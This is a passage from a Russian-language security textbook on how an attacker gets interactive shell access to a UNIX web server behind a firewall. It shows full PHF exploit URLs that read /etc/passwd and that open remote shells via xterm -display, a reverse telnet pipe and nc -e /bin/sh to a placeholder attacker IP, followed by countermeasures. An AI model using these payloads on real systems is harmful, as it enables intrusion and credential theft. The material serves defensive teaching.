Защита информации в Интернет




Интерактивный доступ к командной оболочке

Обсудив два основных метода получения доступа к системе UNIX, необходимо поговорить и об методах, используемых для получения доступа к командной оболочке (shell account access). Необходимо помнить, что основной целью любого взломщика является получение доступа к командной строке или к командной оболочке интересующей его системы. Традиционный метод получения интерактивного доступа к командной оболочке заключается в удаленной регистрации на сервере UNIX с помощью таких программ, как telnet, rlogin или ssh. Кроме того, можно выполнять команды, используя утилиты rsh, ssh, или rexec, не проходя этапа удаленной регистрации. У вас может возникнуть вопрос — а что, если все службы, поддерживающие удаленный доступ, отключены или заблокированы на уровне брандмауэра? Может ли в этом случае взломщик получить доступ к командной оболочке целевой системы? Хороший вопрос. Давайте рассмотрим один пример, на котором можно исследовать различные методы, с помощью которых взломщик может получить интерактивный доступ к командной оболочке UNIX. Эти методы иллюстрируются на рис. 8.1.



Рис. 8.1. Упрощенная архитектура демилитаризованной зоны

Предположим, что взломщик пытается получить доступ к Web-серверу, работающему под управлением операционной системы UNIX, который находится в сегменте так называемой "демилитаризованной зоны" (DMZ) — небольшой сети, размешенной за промышленным маршрутизатором или брандмауэром, защищающим внутреннюю сеть. Тип и модель брандмауэра или маршрутизатора не имеют особого значения. Важно лишь понимать, что такое устройство относится к классу маршрутизирующих брандмауэров, которые не выполняют функций сервера-посредника ни для одной из служб. Предположим, что единственные службы, которая поддерживается брандмауэром, — это HTTP (порт 80) и HTTP поверх SSL (HTTPS) (порт 443). Теперь предположим, что Web-сервер не может противостоять попыткам взлома, например, основанным на изъяне PHF. Кроме того, пусть Web-сервер работает на уровне привилегий пользователя nobody, что является широко распространенной практикой и считается хорошим решением с точки зрения безопасности. Таким образом, если взломщику удастся проникнуть на Web-сервер, используя недостатки в обработке ввода PHF, он сможет выполнять код на сервере с уровнем привилегий пользователя nobody. Это, конечно, важно, но возможность запуска выполняемого кода — лишь первый шаг в получении интерактивного доступа к командной оболочке.

Операции в системе X


После того как взломщик получил возможность выполнять команды на Web-сервере, используя недостатки в реализации PHF, первым из методов, которыми он воспользуется для получения интерактивного доступа к командной оболочке, будет применение средств X Window системы UNIX (далее — просто X). X — это система оконного интерфейса, которая позволяет разным программам использовать один и тот же графический дисплей. Система X чрезвычайно устойчива и позволяет поддерживающим ее клиентным программам отображать свои результаты на локальном или на удаленном сервере X (с использованием портов 6000-6063). Один из самым удобных для взломщика инструментов в этом случае является клиентная программа xterm. Эта программа предназначена для запуска локальной командной оболочки, работающей под управлением X. Однако, применив параметр -display, взломщик может перенаправить командную оболочку на сервер X собственного компьютера. Вот так — быстро и просто.
Давайте посмотрим, как с использованием изъяна PHF злоумышленник может получить результаты, выходящие за рамки простого отображения содержимого файла passwd. Как вы помните, для достижения последнего результата использовалась следующая команда. /cgi-bin/phf?Qalias=x%0a/bin/cat/%20/etc/passwd
Поскольку на Web-сервере взломщик может выполнять любые удаленные команды, то немного модифицированный вариант позволит получить и интерактивный доступ к командной оболочке. Все, что для этого нужно сделать, — это заменить команду /bin/cat /etc/passwd командой /usr/X11R6/bin/xterm-ut -display IР_хакера : 0 . 0, как показано ниже.
/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/
xterm%20-ut%20-display IР_хакера:0.0

Это приведет к тому, что удаленный сервер запустит xterm и выведет окно на X-сервере хакера, имеющего IP-адрес 1Р_хакера, с идентификатором окна 0 и идентификатором экрана 0. С этого момента в руках взломщика окажется полный контроль над целевым компьютером. Кроме того из-за использования параметра -ut это событие не будет зарегистрировано системой. Кроме того, используемые в команде символы %20 представляют собой шестнадцатеричное представление символов пробела, с помощью которых параметры отделяются друг от друга (для получения более подробной информации воспользуйтесь командой man ascii). Таким образом, взломщик получил интерактивный доступ к командной оболочке без регистрации любой службой Web-сервера. Кроме того, вы, должно быть, обратили внимание на то, что в команде использован полный путь к исполняемому файлу xterm. Это сделано для того, чтобы обеспечить запуск программы независимо от того, правильно ли установлена переменная окружения PATH. Применение полного имени файла гарантирует безусловный запуск соответствующей программы.

Реверсивный сеанс telnet и обратные каналы


Безусловно, программа xterm представляет собой самое простое средство получения контроля над системой UNIX. Однако как быть в том случае, если об этом знает не только злоумышленник, но и администратор, удаливший систему X? Эта мера, конечно же, повысит безопасность системы UNIX, но одной ее недостаточно, так как в распоряжении потенциального взломщика остается еще много других методов получения несанкционированного доступа. Одним из таких методов, в частности, является создание обратных каналов. В данном случае термин обратный канал (back channel) применяется для описания механизма, с помощью которого коммуникационный канал создается по направлению от взламываемого узла к компьютеру взломщика, а не наоборот, как при использовании обычных коммуникационных каналов. Нужно напомнить, что в рассматриваемом примере взломщик не может получить интерактивный доступ к командной оболочке обычным способом, так как все порты, кроме 80 и 443, блокируются брандмауэром. Таким образом, злоумышленник должен добиться того, чтобы взламываемый сервер инициировал сеанс с его компьютером, т.е. создать обратный канал.
Для решения этой задачи можно воспользоваться несколькими методами. Первый из них, называемый реверсивный сеанс telnet, заключается в применении утилиты telnet для создания обратного канала от взламываемой системы к компьютеру взломщика. Название реверсивный сеанс telnet (reverse telnet) объясняется тем, что устанавливаемое с помощью команды telnet соединение инициализируется не системой взломщика, а системой, к которой он хочет получить доступ. В большинстве систем UNIX имеется клиент telnet и его использование практически никогда не ограничивается. Именно поэтому в тех случаях, когда программа xterm оказывается недоступной, telnet является вторым прекрасным средством, которое можно применить для создания обратного канала. Чтобы с помощью команды telnet создать обратный канал, необходимо воспользоваться всемогущей утилитой netcat (nc). Для того чтобы другой компьютер мог связаться с вашим компьютером посредством утилиты telnet, необходимо, чтобы на последнем в режиме ожидания была запущена утилита nс, которая и обеспечит установку реверсивного соединения telnet. Для этого в двух отдельных окнах необходимо запустить на выполнение следующие команды.

[tsunami]! nc -I -n -v -p 80
listening on [any] 80
[tsunami]! nc -1 -n -v -p 25
listening on [any] 25

Прежде чем запускать утилиту пс, убедитесь, что в вашей системе с входящими портами 8 С и 25 не связано никаких служб, находящихся в режиме ожидания запросов, например HTTPD или sendmail. Если такие службы имеются, необходимо завершить выполнение соответствующих процессов с помощью команды kill, чтобы освободить требуемые порты для утилиты пс. Параметр -1 означает, что утилиту пс необходимо запустить в режиме ожидания запросов; параметр -v включает режим вывода подробной информации; параметр -n указывает, что IP-адреса не нужно преобразовывать в имена узлов, а параметр -р определяет порт, который будет прослушиваться.
Возвращаясь к рассматриваемому примеру, отметим, что для инициализации реверсивного соединения telnet на взламываемом сервере необходимо запустить следующую команду, действие которой основано на наличии уже известного нам изъяна PHF.
/bin/telnet IР_хакера 80 | /bin/sh | /bin/telnet IР_хакера 25
Данная команда, представленная в виде параметра PHF, выглядит следующим образом.
/cgi-bin/phf?Qalias=
x%0a/bin/telnet%20IP_xaкepa
%2080%20I%20/bin/sh%20
|%20/bin/telnet%20IP_xaкepa%2025

Давайте посмотрим, что происходит, когда Web-серверу броузер передает данную строку. С помощью команды /bin/telnet IР_хакера 80 на взламываемом узле запускается telnet и подключается к порту 80 нашего компьютера. Это позволит нам вводить команды, которые будут выполняться удаленным компьютером. В соответствии со стандартными соглашениями ввода/вывода системы UNIX все, что мы будем набирать на клавиатуре, будет перенаправляться в качестве ввода командной оболочке Bourne (/bin/sh). Выводимые же результаты с помощью конвейера будут перенаправлены командой /bin/telnet по адресу IР_хакера на порт 25. Все это вместе взятое и создаст реверсивный сеанс teinet-связи. отображаемый в двух окнах. Порты 80 и 25 выбраны из-за того, что большинство брандмауэров чаще всего разрешает их использовать для создания исходящих соединений. Однако можно выбрать и любые другие порты, — лишь бы их использование для обмена данными не блокировались брандмауэром.
Второй метод создания обратного канала заключается в использовании самой утилиты nс. Для этого достаточно, чтобы программа nс уже присутствовала на сервере или могла быть помещена туда с помощью какого-либо механизма (например, через анонимный сеанс FTP). Как мы уже не раз отмечали, пс — это одна из лучших утилит. Поэтому совсем не удивительно, что в последнее время ее можно найти в комплекте поставки многих бесплатных версий UNIX. К сожалению, последнее обстоятельство имеет и обратную сторону — это повышает вероятность того, что хакеру даже не понадобится внедрять эту утилиту на интересующий его узел. Однако само присутствие пс на узле еще вовсе не означает, что ее можно сразу же использовать для создания обратного канала, поскольку нет никаких гарантий того, что она была скомпилирована с использованием директивы #def ine GAPING_SECURITY_HOLE, без которой параметр -е, используемый для создания обратного канала, применить не удастся. В нашем примере мы будем считать, что на узле каким-то образом оказалась нужная версия пс.
Подобно описанному выше telnet-методу, создание обратного канала с помощью утилиты пс состоит из двух этапов. Сначала необходимо выполнить следующую команду, которая впоследствии обеспечит взаимодействие с обратным каналом, созданным с использованием nс на взламываемом компьютере.
[tsunami]# nс -1 -n -v -p 80
После того как запущена утилита прослушивания, на удаленном узле необходимо выполнить следующую команду.
nс —е /bin/sh IР_хакера 80
Данная команда, представленная в форме, требуемой для использования изъяна PHF, имеет следующий вид.
/cgi-bin/phf?Qalias=x%0a/bin/nc%20-
e%20/bin/sh%20IP_xaкepa%2080

Как только Web-сервер выполнит эту строку, с помощью утилиты nс будет создан обратный канал, который подключит командную оболочку (в данном случае — /bin/sh) к находящемуся в режиме ожидания компьютеру хакера. Это обеспечит интерактивный доступ к командной оболочке, причем соединение будет установлено самой взламываемой системой.

Контрмеры: защита от попыток создания обратных каналов


Противостоять попыткам создания обратного канала очень трудно. Самой лучшей превентивной мерой является применение всех средств обеспечения безопасности, что позволит устранить возможность использования подобного метода. К таким мерам относятся отключение ненужных служб и применение всех модулей обновления сразу же после их появления.
Среди прочих защитных мероприятий можно выделить следующие.

  •  Удалите систему X со всех компьютеров, которым требуется высокий уровень обеспечения безопасности. Это позволит защититься не только от потенциальной опасности использования взломщиками программы xterm, но и от служащих, которые могут попытаться расширить свои полномочия до привилегий суперпользователя root, воспользовавшись недостаточной степень защиты Х-сервера.
  •  Если Web-сервер функционирует с привилегиями пользователя nobody, настройте разрешения для исполняемых файлов, например telnet, таким образом, чтобы запретить их выполнение всем пользователям, за исключением владельцев этих файлов и определенных групп (например, с использованием команды chmod 750 telnet). Это позволит сохранить возможность запуска telnet легитимными пользователями, но лишит такой возможности те программы, использующие идентификаторы пользователей, которые не должны запускать telnet в процессе своей работы.
  •  В некоторых случаях можно настроить брандмауэр таким образом, чтобы запретить соединения, исходящие от Web-сервера или другого внутреннего узла. Это особенно полезно, если брандмауэр построен на основе прокси-сервера. поскольку создать обратный канал через такой брандмауэр, выполняющий аутентификацию, достаточно сложно, но все же возможно.


Назад Начало Вперед



Книжный магазин